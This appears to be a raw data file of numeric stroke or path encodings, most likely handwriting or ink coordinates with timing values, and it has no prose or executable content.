0,-1 1 0,0-1 0,0 0 0,-1 0 0,1-1-1,6-8 1,-6 6-4,0 0 0,0-1-1,-1 0 1,0 0-1,0-1 1,3-9-1,1-4-3,-6 17 8,0 1 0,0 0 0,-1-1 0,0 1 1,0-1-1,0 1 0,1-10 0,-2 8 1,0 1 4,0-1-1,0 1 0,0 0 1,-1-1-1,1 1 0,-1 0 1,-1 0-1,1 0 0,-3-8 1,0 0 11,4 13-16,0-1 0,0 1-1,0-1 1,-1 0-1,1 1 1,0-1 0,0 1-1,0-1 1,0 1 0,0 0-1,-1-1 1,1 1-1,0-1 1,-1 1 0,1-1-1,0 1 1,-1 0-1,1-1 1,0 1 0,-1-1-1,1 1 1,0 0-1,-1 0 1,1-1 0,-1 1-1,1 0 1,-1 0 0,0-1-1,-17-10 106,16 8-82,-1 1 0,1 0 0,-1 1 1,0-1-1,1 0 0,-1 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0 1 0,0-1 0,0 0 0,-1 1 1,1 0-1,0 0 0,0 0 0,0 0 0,0 0 0,-1 1 0,-2 0 0,0 0-36,-1 1-1,1 0 1,0 0 0,0 0-1,0 1 1,0 0 0,1 0-1,-1 1 1,1-1 0,0 1-1,0 0 1,0 1 0,1-1-1,-1 1 1,1 0 0,0 0-1,0 0 1,1 1 0,0-1-1,-6 13 1,-9 24-1671,-3-1-3785,19-24 281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0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44 412,'0'0'581,"10"18"2334,-9-16-2804,-1-1 1,1 1 0,-1 0-1,1 0 1,0 0 0,-1-1-1,1 1 1,0 0-1,0-1 1,0 1 0,1-1-1,-1 1 1,0-1 0,0 1-1,1-1 1,-1 0 0,3 2-1,-2-3 867,-2 0-938,1 0 1,-1 0-1,1 0 0,-1 0 0,1-1 0,-1 1 0,1 0 0,-1 0 1,1 0-1,-1-1 0,1 1 0,-1 0 0,1-1 0,-1 1 0,0 0 0,1-1 1,-1 1-1,0-1 0,1 1 0,-1 0 0,0-1 0,0 1 0,1-1 1,-1 1-1,0-1 0,0 1 0,0-1 0,1 1 0,-1-1 0,0 1 1,0-1-1,0 1 0,0-1 0,0 0 0,11-40 1096,10 9-850,-21 32-278,0 0 0,0 0 1,0 0-1,0-1 0,0 1 0,0 0 0,0 0 0,-1 0 0,1 0 0,0-1 1,0 1-1,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,1 1 0,-1 0 1,0 0-1,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0-1 0,1 1 0,-1 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0-1 0,0 1 1,0 0-1,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 1,1 0-1,-1 0 0,0 0 0,0 0 0,0 0 0,0 1 0,1-1 0,-1 0 1,0 0-1,0 0 0,0 0 0,1 0 0,-1 2 123,-6-4 484,15 33 345,2 30-786,0 5 289,14 32 445,-23-92-952,16 39 326,-17-43-341,0-1 0,-1 1 0,1-1 0,0 1 0,0-1 1,0 1-1,0-1 0,1 1 0,-1-1 0,0 0 1,0 0-1,1 1 0,-1-1 0,1 0 0,-1 0 0,1 0 1,-1-1-1,1 1 0,0 0 0,-1-1 0,3 1 0,-2 4-1843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28,'0'0'1227,"11"18"2886,-9-12-3822,0-1 0,1 1 0,0-1 1,0 1-1,0-1 0,4 5 0,0 1 64,6 11 213,-8-11-413,1-1 0,0 0-1,0 0 1,1 0 0,1-1-1,-1 0 1,2 0 0,-1-1 0,14 11-1,-20-19-211,-1 1 0,1-1 1,-1 0-1,0 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1-1 1,-1 1-1,1 0 0,-1-1 0,0 1 0,1-1 0,-1 1 0,0-1 0,0 0 1,0 0-1,1 1 0,-1-1 0,0 0 0,0 0 0,0 0 0,1-2 0,21-26-2791,-2-15-308,-12 27 1987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8 204,'0'-1'-110,"18"-6"4636,-11 8-898,-12 8-1336,-1 0-1702,1 0-1,0 0 1,0 1-1,1 0 1,1 0-1,0 0 1,-3 10-1,-9 31 463,-21 68 220,18-51-764,-24 119 722,40-154-1108,2-31-134,1 1 0,-1-1 1,0 1-1,0-1 0,0 1 0,-1-1 0,1 1 1,0-1-1,-1 0 0,0 1 0,0-1 0,1 0 1,-1 1-1,-1-1 0,0 3 0,1-7-576,0 1-1,1 0 1,-1 0 0,1-1-1,-1 1 1,1-1-1,0 1 1,0 0 0,0-1-1,0 1 1,0-1-1,0 1 1,0 0 0,0-1-1,0 1 1,0-1 0,1 1-1,-1 0 1,1-1-1,-1 1 1,2-2 0,7-14-2963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0 756,'0'0'793,"22"5"5775,-33 28-1917,10-28-4184,0 1-1,-1 0 1,0-1 0,0 1 0,0-1-1,-6 10 1,-8 20 160,-24 56 115,34-72-564,1 0 0,1 1 1,-4 37-1,19 11 205,-11-61-378,1 1-1,0-1 1,1 0-1,0 0 1,0 0-1,0 0 1,1 0-1,0-1 1,0 1-1,1-1 1,0 1-1,0-1 1,0 0-1,1-1 1,0 1-1,0-1 1,0 0-1,1 0 1,-1-1-1,1 0 1,0 0-1,1 0 1,-1 0-1,1-1 1,-1 0-1,8 2 1,-12-5-228,1 1 1,-1 0-1,0-1 0,0 1 1,0-1-1,0 0 1,1 1-1,-1-1 1,0 0-1,0-1 1,0 1-1,5-1 0,1-8-3742,-5-11-3326,-3 9 4187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2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54 644,'4'27'4892,"-4"-24"-4729,1 0 0,0 0-1,0-1 1,0 1 0,0 0 0,1-1-1,-1 1 1,1 0 0,-1-1-1,1 0 1,3 4 0,14 16 422,-17-19-560,0 0 1,0 0-1,1 0 1,-1 0 0,1-1-1,-1 1 1,1-1-1,0 0 1,0 0 0,0 0-1,0 0 1,0 0-1,1 0 1,4 1-1,-1-2 30,0 0-1,0 0 1,0 0-1,0-1 0,0 0 1,1 0-1,-1-1 1,0 0-1,0 0 0,0-1 1,0 0-1,0 0 1,0 0-1,-1-1 0,1 0 1,-1 0-1,0-1 0,10-7 1,-12 7 18,1-1 0,-1 0 0,0 0 0,-1 0 0,1-1 0,-1 1 0,0-1 1,-1 0-1,1 0 0,-1 0 0,0 0 0,2-12 0,-4 16 42,0-1-1,-1 0 1,1 1-1,-1-1 1,1 1 0,-1-1-1,0 1 1,0-1-1,0 1 1,0-1 0,-1 1-1,1 0 1,0-1-1,-1 1 1,0 0-1,1 0 1,-1 0 0,0 0-1,0 1 1,0-1-1,0 0 1,-1 1 0,1 0-1,0-1 1,-1 1-1,1 0 1,-1 0 0,1 0-1,-1 1 1,1-1-1,-1 0 1,0 1 0,1 0-1,-1 0 1,0 0-1,1 0 1,-4 0 0,-4 0 20,1 0 0,0 1 0,-1 0 0,1 1 0,0 0 0,0 0 0,0 1 1,0 0-1,-9 5 0,14-6-168,-1 1 0,1-1 0,-1 1-1,1 0 1,0 1 0,0-1 0,0 0 0,1 1 0,-1 0 0,1 0 0,0 0 0,0 0 0,1 1-1,-1-1 1,-3 9 0,1 25-6199,16-37 1859,-1-1 1841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47 608,'10'-12'3090,"-9"11"-2979,0 1 1,-1-1-1,1 1 0,0-1 0,0 0 0,-1 1 1,1-1-1,0 0 0,-1 1 0,1-1 0,-1 0 1,1 0-1,-1 1 0,1-1 0,-1 0 0,0 0 0,1 0 1,-1 0-1,0 0 0,1-1 0,3-4 281,2-6 7425,-6 13-7742,0-1-1,0 0 1,0 0-1,0 1 1,0-1-1,0 0 0,0 0 1,0 1-1,0-1 1,0 0-1,0 0 1,-1 0-1,1 1 1,0-1-1,0 0 1,0 0-1,0 0 1,-1 1-1,1-1 0,0 0 1,0 0-1,0 0 1,-1 0-1,1 0 1,0 1-1,0-1 1,-1 0-1,1 0 1,0 0-1,0 0 0,0 0 1,-1 0-1,1 0 1,0 0-1,0 0 1,-1 0-1,1 0 1,0 0-1,0 0 1,-1 0-1,1 0 1,0 0-1,0 0 0,-1-1 1,1 1-1,0 0 1,-1 0-1,0 0 1,-12 17 388,12-17-387,-14 3-5,14-3-53,1 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0-1,-1 0 1,1 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 1 0,0-1 0,0 0 0,-1 0-1,1 0 1,0 0 0,0 1 0,0-1 0,0 0 0,-1 0 0,1 0 0,0 1 0,0-1 0,0 0 0,0 0-1,0 1 1,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0-1,0 1 1,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,1 1 0,-1-1-1,0 0 1,0 0 0,0 0 0,0 1 0,1-1 0,-1 0 0,0 0 0,0 0-14,-1 0 1,0 0 0,0 0-1,0-1 1,1 1 0,-1 0-1,0 0 1,0 0 0,0 1-1,1-1 1,-1 0-1,0 0 1,0 0 0,0 1-1,1-1 1,-1 0 0,0 1-1,0-1 1,1 0 0,-1 1-1,0-1 1,1 1 0,-1-1-1,1 1 1,-1 0-1,0 0 1,-22 10 32,23-9-27,0-1 0,-1 0-1,1 1 1,-1-1 0,1 0-1,-1 0 1,1 0 0,-1 0-1,0 1 1,0-1 0,1 0-1,-1 0 1,0 0 0,-2 1-1,-7 64-11,10-64 2,0 0 1,0 0-1,0 0 0,0 0 1,0 0-1,1 0 0,-1 0 0,1-1 1,-1 1-1,1 0 0,0 0 0,0 0 1,-1-1-1,1 1 0,1 0 1,-1-1-1,0 1 0,0-1 0,3 3 1,0 1-16,-1-2 12,0 0-1,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,1 0 0,-1 0 0,1 0 0,0 0 0,0-1 0,-1 1 0,1-1 0,0 0 1,0 0-1,0-1 0,0 1 0,0-1 0,0 0 0,0 0 0,1 0 0,-1 0 0,0-1 0,0 1 0,0-1 0,0 0 0,-1-1 1,1 1-1,0-1 0,0 1 0,-1-1 0,1 0 0,-1 0 0,1-1 0,-1 1 0,6-6 0,-5 4-5,0 0 0,-1 0 0,1 0 0,0 0 0,-1-1 0,0 1 1,0-1-1,-1 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,-1-1 0,1 1 0,-1 0 0,0-10 0,-1 12 7,0 1 1,-1-1-1,1 1 0,-1 0 1,0-1-1,0 1 0,0 0 1,0-1-1,0 1 0,0 0 0,-1 0 1,1 0-1,-1 0 0,1 0 1,-1 0-1,0 1 0,0-1 1,0 0-1,0 1 0,0 0 1,0-1-1,0 1 0,0 0 0,-5-2 1,3 2-5,-1-1 0,1 0 0,-1 1 0,1 0 0,-1 0 0,1 0 0,-1 1 0,0 0 0,0 0 0,1 0 0,-1 0-1,-8 2 1,5 1-154,0 1 0,0 0 0,0 0 0,1 0 0,0 1-1,-9 8 1,-23 20-3573,21-18-432,6-2-1887,3-7 2973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0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18 756,'0'-17'6617,"0"28"-5005,0-6-1264,-1 0 1,1 0-1,1 0 1,-1 0-1,1 0 1,0 0-1,0-1 1,0 1-1,0 0 0,3 5 1,1 10 1000,1-2-313,-5-17-926,0 1-1,1 0 0,-1 0 0,-1 0 0,1 0 0,0 1 1,0-1-1,-1 0 0,1 0 0,-1 0 0,0 3 0,5 16 300,1-9-256,8 24 106,-13-34-260,-1 0-1,1 0 0,0 0 1,0 0-1,0 1 1,0-1-1,0 0 0,0-1 1,0 1-1,1 0 1,-1 0-1,1 0 0,-1-1 1,4 3-1,-3 5-1941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19 756,'-2'-19'9461,"-23"27"-3604,20-5-5562,0 1 1,0 0-1,1 0 1,-1 0-1,1 0 1,-5 6 0,5-5-269,1-1 1,-1 1 0,1 0 0,0 0-1,1 0 1,-1 0 0,1 0-1,0 0 1,0 1 0,1-1 0,-1 1-1,0 7 1,-9 35 356,11-44-383,1 0 0,-1 0 0,1-1 0,-1 1 0,1 0 0,0-1-1,0 1 1,1 0 0,-1-1 0,1 1 0,0-1 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,5 2-1,0 1 21,1-2-1,-1 1 1,1-1-1,0 0 0,0 0 1,1-1-1,9 2 0,-14-4-33,-1 0 0,1-1 0,0 1-1,0-1 1,-1 0 0,1 0 0,0 0-1,-1-1 1,1 1 0,0-1 0,-1 0 0,1 0-1,0 0 1,-1-1 0,0 1 0,1-1-1,-1 0 1,0 0 0,0 0 0,0 0-1,0 0 1,4-5 0,3-3-235,-1-1-1,0 0 1,-1 0 0,10-19 0,-17 28 218,0 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,-1-1 0,1 1 0,-1 0 0,0 0 1,-1-2-1,-22-38-58,17 31 82,5 8 17,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,-1 1 0,0-1 0,1 1 0,-7-4 0,-20 2 259,26 3-265,0 0 0,0 0 0,-1 0 0,1 1 0,0-1 0,-1 1 0,1 0 0,0 0 0,-1 0 0,1 1 0,0-1 0,-1 1 0,1 0 0,0 0 0,0 0 0,-4 2 0,-38 16-2412,3-2-4956,39-16 6939,0-2-715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0:1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0 620,'0'0'1518,"2"11"624,-1-9-1870,1 0 1,-1 0-1,0 0 1,0 0 0,0 1-1,0-1 1,0 0-1,-1 0 1,1 1 0,-1-1-1,1 0 1,-1 1-1,0-1 1,0 0-1,0 1 1,0-1 0,0 0-1,-2 5 1,2 8 1888,11 16 1158,-12 6-1277,0-19-1696,1 0 0,1 0 0,0 0 1,8 36-1,2 12-94,-3-38-206,5 10-16,-5-23-39,-8-14-60,0 0-1,1 0 1,-1 1 0,0-1 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1-1 0,0 1 0,0 0 0,0 0-1,0-1 1,0 1 0,1-1 0,-1 1 0,0-1 0,0 1 0,0-1 0,0 0 0,2 1 0,-1-1-1338,-23-12-13487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3:0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05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5:5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4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1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44:36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13 132,'0'0'136,"0"-6"40,11 6-140,-11-6-16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1T17:51:2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0T19:44:0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2:4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3:0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0 883 12,'0'-18'16351,"2"-6"-15910,1 20-377,-1 1 1,0 0 0,0-1 0,0 1-1,0-1 1,-1 1 0,1-1 0,-1 0 0,0 0-1,0 0 1,0-5 0,10-26 65,0 16 33,-11 16-136,0 1-1,1 0 0,-1 0 1,1-1-1,0 1 1,0 0-1,0 0 0,0 0 1,0 0-1,2-3 1,-2 3-11,1 0 0,-1 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0-1 0,-1 1 0,1-5 0,9-17-34,-8 22 10,-1-1 0,0 1 0,1 0 1,-1-1-1,0 1 0,0-1 0,0 0 0,-1 1 0,1-1 0,0-3 0,9-20 75,-9 23-56,1 1 0,-1-1-1,1 0 1,-1 0 0,0 0-1,0 0 1,0 0 0,-1 0 0,1-3-1,11-25 118,-2 5-15,-1-3-12,-7 25-89,0-1 1,0 1-1,-1 0 0,1 0 1,-1-1-1,0 1 1,0-8-1,9-6 54,-9 17-62,0 0 0,0-1-1,0 1 1,0 0 0,0 0 0,0-1-1,0 1 1,-1 0 0,1-1-1,0 1 1,-1-1 0,1 1 0,-1-1-1,0 0 1,1 1 0,-1-3-1,0 2 2,0 0 0,1 0 0,-1-1-1,1 1 1,0 0 0,-1 0 0,1 0-1,0 0 1,0 0 0,0 0-1,2-2 1,-2 2 5,1 0 0,-1 0-1,0-1 1,0 1 0,0 0-1,0-1 1,0 1 0,0-1 0,-1 1-1,1-1 1,-1-3 0,11-14 25,-10 19-35,0 0-1,0 0 1,0 0-1,0-1 1,0 1 0,-1 0-1,1-1 1,0 1-1,-1-1 1,1 1 0,0-1-1,-1 1 1,0-1-1,1-2 1,9-19 83,-9 20-87,1 1 1,-1 0-1,0-1 1,1 1-1,-1-1 1,0 1-1,-1-1 1,1 0-1,1-4 0,-3 2-2,1 5 6,0-1 0,0 1 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0-1 0,0 1 1,1 0-1,-1-1 0,0 1 0,0 0 0,0-1 0,1 1 0,-1 0 0,0-1 0,0 1 0,1 0 0,-1 0 0,0-1 0,1 1 0,-1 0 0,0 0 0,1-1 0,-1 1 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 1,-1 0-1,1-1 0,-1 1 0,0 0 0,1 0 0,0 0 0,-1-1-1,1 0 1,-1-1-1,1 1 1,-1 0-1,0-1 1,0 1-1,1-1 1,-1 1-1,0 0 1,0-1-1,0 1 1,-1-1-1,1 1 1,-1-3-1,2 2-8,-1-1 1,1 0-1,0 1 0,0-1 0,0 1 0,0 0 0,1-1 0,-1 1 0,0 0 0,1 0 0,0 0 0,-1 0 0,4-3 0,-1-14-362,-2 16 359,0 1 1,0-1-1,0 0 0,0 0 1,0 1-1,-1-1 1,1 0-1,-1-1 1,0 1-1,1-4 0,-2 5 16,0-3-1,11-20 32,-7 20-45,0 3 6,-1-20 4,-3 21 1,0-11 14,0 13-15,0-1 1,0 0-1,0 0 0,0 0 1,1 0-1,-1 1 1,0-1-1,0 0 1,0 0-1,0 0 0,0 0 1,1 0-1,-1 0 1,0 1-1,0-1 1,0 0-1,0 0 1,1 0-1,-1 0 0,0 0 1,0 0-1,0 0 1,1 0-1,-1 0 1,0 0-1,0 0 0,0 0 1,1 0-1,-1 0 1,0 0-1,0 0 1,0 0-1,0 0 0,1 0 1,-1 0-1,0 0 1,0-1-1,0 1 1,0 0-1,1 0 0,-1 0 1,0 0-1,0 0 1,0 0-1,0-1 1,0 1-1,1 0 1,-1 0-1,0 0 0,0 0 1,0-1-1,0 1 1,0 0-1,0 0 1,0 0-1,0 0 0,0-1 1,0 1-1,0 0 1,0 0-1,0 0 1,0-1-1,0 1 0,0 0 1,0 0-1,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 1,0 1-1,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 1,0 0-1,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 1,0 1-1,1-1 0,-1-1 0,0 2 33,0-14 110,1 12-141,-1 0 0,1 0 1,-1 0-1,0 0 1,1 0-1,-1 0 0,0 0 1,0 0-1,0 0 1,0 0-1,0 0 0,0-1 1,0 1-1,-1 0 1,1 0-1,0 0 0,0 0 1,-1 0-1,1 0 1,-1-1-1,4 1-6,2-2 106,-2 12-37,0-3-34,4 7 17,4 17-41,0 1 28,0 5 1,-11-30-27,1-1 0,0 0 0,0 0 0,0 0 0,0 1 0,5 7 0,4 27-33,-9-34 20,0-1 0,0 0 0,0 1 0,1-1 1,0 0-1,0 0 0,0 0 0,1 0 0,4 6 0,-4-6 6,0-1-1,-1 1 0,1 0 0,-1 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 8 0,0-2 3,1-1 0,-1 0 1,2 0-1,-1 0 0,1-1 0,9 15 1,-4 0 3,3 2-1,-1 4 5,2 11 161,-13-35-125,-1-4-37,1-1 1,0 0-1,0 1 0,0-1 1,0 0-1,0 1 1,0-1-1,0 0 0,0 1 1,1-1-1,-1 0 0,0 1 1,1-1-1,-1 0 0,1 0 1,-1 1-1,1-1 0,0 0 1,0 0-1,-1 0 0,1 0 1,2 2-1,-3-3-9,0 1 0,1-1 0,-1 1 0,0-1 0,1 0 0,-1 1-1,0-1 1,0 1 0,0-1 0,1 1 0,-1 0 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1-1,0-1 1,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,-1 0 0,2 10 29,2-8-15,-1 0 0,0 0 1,0 0-1,0 0 0,-1 0 1,1 0-1,-1 1 0,1-1 1,-1 0-1,0 1 1,0 3-1,10 12 196,-11-18-173,11 16 62,-10-15-97,19 26 21,-20-28-24,0 1 1,0-1 0,-1 1-1,1-1 1,0 0 0,0 1-1,0-1 1,0 0 0,0 1-1,0-1 1,0 0 0,0 1-1,0-1 1,0 1 0,0-1-1,0 0 1,0 1 0,0-1-1,0 0 1,0 1 0,0-1-1,1 0 1,-1 1 0,0-1 0,0 0-1,0 1 1,1-1 0,-1 0-1,0 1 1,0-1 0,1 0-1,-1 0 1,0 1 0,1-1-1,-1 0 1,0 0 0,1 0-1,-1 1 1,0-1 0,1 0-1,-1 0 1,0 0 0,1 0-1,-1 0 1,0 0 0,1 0-1,-1 0 1,1 0 0,-1 0 0,0 0-1,1 0 1,3 18 187,14-5 175,-17-13-316,10 17 907,-11-16-930,0-1-157,-1 0 96,1 0 1,0 0-1,-1 0 1,1 0-1,0 0 1,-1 0 0,1 0-1,0 0 1,-1 0-1,1 0 1,0 0 0,-1 0-1,1 0 1,0 0-1,-1 0 1,1-1-1,0 1 1,-1 0 0,1 0-1,0 0 1,0 0-1,-1-1 1,1 1 0,0 0-1,0 0 1,-1-1-1,1 1 1,0 0 0,0 0-1,0-1 1,-1 1-1,1 0 1,0-1-1,0 1 1,0 0 0,0-1-1,0 1 1,0 0-1,0-1 1,-1 1 0,0-2-926,0 0 1,-1 0 0,0 0 0,1 0 0,-1 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0 0 0,0 0-1,-1 0 1,1 0 0,0 0 0,-4-1 0,-13-4-2501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43 8,'-1'-23'4234,"-2"21"-4255,2 2 82,1 0 0,-1 0 0,1 0 0,0-1 0,-1 1 0,1 0 0,0 0 0,0 0 0,-1-1 0,1 1 0,0 0 0,-1 0 0,1-1 0,0 1 0,0 0 0,0-1 0,-1 1 0,1 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 1,-1-1-1,1 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0-1 0,1 1 0,-1-1 704,-11 1 6687,19-7-2739,-5 13-5059,-3-5 367,32-1 176,76-6-101,-24 12-52,-41 1-63,-50-4-598,-1-1 1,0 0-1,0 0 1,1 0-1,-1-1 0,-15 0 1,-25-4-8282,38-2 5433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0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88,'0'0'13152,"2"19"-11712,-1-17-1417,0-1-1,0 1 1,0-1 0,0 1-1,0-1 1,0 1 0,-1 0-1,1-1 1,0 1 0,-1 0 0,1 0-1,-1 0 1,0-1 0,0 1-1,0 0 1,1 0 0,-2 2-1,0 46 236,1-31-175,0 242 365,-11-200-269,11 54-72,-11-66-109,11-45 19,0 0 1,0 0-1,0 0 0,0 0 1,-1 0-1,0-1 1,1 1-1,-1 0 0,-1 0 1,-2 6-1,-7 26 45,10-34-62,1 0 1,-1 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,0 0-1,-1 0 1,1 0 0,0 0 0,0 1 0,1 1 0,-1-2 2,1 0 1,-1-1-1,0 1 1,0 0 0,0-1-1,0 1 1,-1 0-1,1-1 1,0 1-1,-1-1 1,1 1-1,-1 0 1,1-1 0,-1 1-1,0-1 1,1 1-1,-3 1 1,2 1 28,0 0 1,0 0-1,1 1 1,-1-1-1,1 0 1,0 1-1,0-1 1,0 1-1,2 7 1,-1 4 177,4-10-174,-9-1 27,3-4 130,11-32-345,1-18-3319,-11-30-7140,0 56 7613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1 672,'0'7'3617,"0"-8"-3179,2 0-251,-1 1-1,1 0 1,0 0-1,-1 0 1,1 0-1,-1 0 1,1 0-1,-1 0 1,1 1-1,-1-1 1,1 0-1,-1 1 1,1 0-1,1 0 1,6 2 684,76-3 4620,-10 6-3899,-56-7-1365,-14 1-175,1-1-1,0 1 1,-1 0 0,1 1-1,0-1 1,-1 1 0,1 0-1,8 3 1,-8-2-65,0-1 0,1 1-1,0-1 1,-1-1 0,12 1 0,-18-1-8,0 0 0,0 0-1,0-1 1,1 1 0,-1 0-1,0 0 1,0 0 0,0 0-1,0 0 1,1 0 0,-1 0 0,0 0-1,0-1 1,0 1 0,1 0-1,-1 0 1,0 0 0,0 0 0,0 0-1,1 0 1,-1 0 0,0 0-1,0 0 1,0 0 0,1 0-1,-1 1 1,0-1 0,0 0 0,0 0-1,0 0 1,1 0 0,-1 0-1,0 0 1,0 0 0,0 0 0,0 0-1,1 1 1,-1-1 0,0 0-1,0 0 1,0 0 0,0 0-1,0 1 1,0-1 0,0 0 0,1 0-1,-1 0 1,0 0 0,0 1-1,0-1 1,0 0 0,0 0-1,0 0 1,0 1 0,0-1 0,0 0-1,0 0 1,0 0 0,0 1-1,0-1 1,0 0 0,0 1 0,-1-1-138,1-1 0,0 1 0,-1 0 0,1 0-1,0 0 1,-1 0 0,1 0 0,0 0 0,-1-1 0,1 1 0,0 0 0,0 0 0,-1 0 0,1-1 0,0 1 0,0 0 0,-1 0 0,1-1 0,0 1 0,0 0 0,0-1 0,-1 1 0,1 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,1-1 0,-3-9-3033,-7 3-70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0 644,'0'0'849,"11"16"2272,-11-2 865,11 5-1716,-11-13-1771,0-2-280,-1-1 0,1 1-1,0 0 1,1 0 0,-1-1 0,1 1 0,0 0-1,0-1 1,0 1 0,0 0 0,3 4 0,-3-4-148,0-1 1,0 0-1,-1 0 1,1 1-1,-1-1 1,0 0-1,0 1 0,0-1 1,0 0-1,-1 6 1,1 26 359,5-13-264,-1 0 0,-1 0 1,-1 0-1,-1 0 0,-1 1 0,-3 27 0,0 16 198,-7-11-150,10 35 450,-11-64-551,11-16-127,0 1 91,0-1-1,0 0 0,-1 0 0,0 0 1,-1 0-1,-3 10 0,3-10-16,0 0 0,1-1 0,0 1 0,1 0 0,0 0-1,2 17 1,0 20 52,-7-47-114,8 0-1,-1 0-1,-23-20-821,17 6-2212,-1 1 0,0-1 0,-14-23 0,8 13-370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4,'0'0'6201,"33"-5"-2002,-20 1-3714,0 0 0,1 1 0,-1 1 0,1 0 0,0 1 0,-1 0 0,1 1 0,27 3 0,-32-2-390,-1-1-1,1-1 0,0 1 0,-1-1 0,16-4 0,-3 1 40,117-28 709,-112 24-774,13-4-107,-39 11 21,1 1 0,-1 0 1,1-1-1,-1 1 0,1 0 0,0 0 0,-1 0 0,1-1 0,-1 1 0,1 0 0,0 0 0,-1 0 1,1 0-1,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 1 0,-1-1 1,1 0-1,-1 0 0,1 1 0,-1-1 0,1 0 0,-1 1 0,1-1 0,-1 0 0,1 1 0,-1-1 1,1 1-1,0 0 0,-3-1-647,1 0 0,0 0-1,0 0 1,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1-1,0 1 1,0-1 0,0 0 0,-1 0 0,-7-6-2461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14 304,'0'0'769,"11"5"3239,-6-11-2746,-10 1 2939,1-3 80,-12 8-3317,5 2-682,9-2-263,-1 1 0,1 0 0,-1-1 1,1 1-1,-1 0 0,1 1 0,0-1 1,0 0-1,-1 1 0,-1 1 0,-22 13 44,24-15-67,-19 12 337,19-6-323,0 0 0,0 0 0,0-1 0,-1 1 0,0-1 0,-1 0 1,1 0-1,-7 8 0,7 15 22,0-21-40,1 0 0,0 1-1,0-1 1,1 0 0,0 1 0,0-1 0,1 1 0,0-1 0,2 11-1,-1 7-1,0-23 7,1-1 1,0 1-1,-1-1 1,1 0-1,0 1 1,1-1-1,-1 0 1,0 0-1,0-1 1,6 4-1,-1 1 10,-3-3-2,0 1 0,0-1-1,0 0 1,1 0 0,0 0 0,-1-1-1,1 1 1,0-1 0,0 0-1,0-1 1,0 1 0,1-1 0,-1 0-1,0 0 1,1-1 0,-1 1 0,0-1-1,1 0 1,-1-1 0,0 1-1,9-3 1,5-2-8,-13 4 9,0 0 1,0-1 0,1 0 0,-2 0-1,1 0 1,0-1 0,0 0-1,-1 0 1,1 0 0,-1-1 0,0 1-1,5-7 1,3 0-8,-12 10 0,1-1 1,-1 1 0,0-1-1,0 0 1,0 0 0,0 1-1,0-1 1,0 0 0,-1 0 0,1 0-1,0 0 1,0 0 0,0 0-1,-1 0 1,1 0 0,-1 0-1,1-1 1,-1 1 0,1 0-1,-1 0 1,0 0 0,1-1 0,-1 1-1,0-2 1,0 1 4,1 0 0,0 0 0,-1 0 0,1 0 0,0 1 0,0-1 0,0 0 1,0 0-1,1 1 0,-1-1 0,0 1 0,3-3 0,-2 2 4,0 1-1,-1-1 1,1 0 0,-1 1-1,0-1 1,0 0 0,1 0-1,-1 0 1,0 0 0,0 0-1,-1 0 1,1-1 0,0-1 0,10-39-62,-11 35 39,0 6 68,1-1 0,-1 1 0,0 0 1,0-1-1,0 1 0,-1-1 0,1 1 1,-1 0-1,1-1 0,-1 1 1,0 0-1,0-1 0,0 1 0,0 0 1,-2-3-1,-5-5 258,8 9-284,-1 0-1,1 0 1,-1-1 0,0 1 0,0 0 0,1 0-1,-1 0 1,0 0 0,0 0 0,0 0 0,0 0-1,0 0 1,-1 0 0,1 1 0,0-1 0,0 0-1,0 1 1,-1-1 0,1 1 0,0-1 0,-1 1-1,1-1 1,0 1 0,-1 0 0,1 0 0,-1 0-1,1 0 1,0 0 0,-1 0 0,1 0 0,0 0-1,-1 1 1,1-1 0,0 0 0,-1 1 0,1-1-1,0 1 1,-2 0 0,2-1-18,-1 0 0,1 0 0,0 0 0,-1 0 0,1-1 0,0 1 1,0-1-1,-1 1 0,1-1 0,0 1 0,0-1 0,0 0 0,-1 0 0,1 1 0,0-1 0,-1-2 0,-10-4 34,-40-5 49,50 12-78,-39-6-223,37 6-248,0 1 0,0-1-1,0 1 1,0 0 0,0 0-1,0 1 1,0-1 0,0 1 0,1 0-1,-1 0 1,-4 3 0,-18 8-8674,15-8 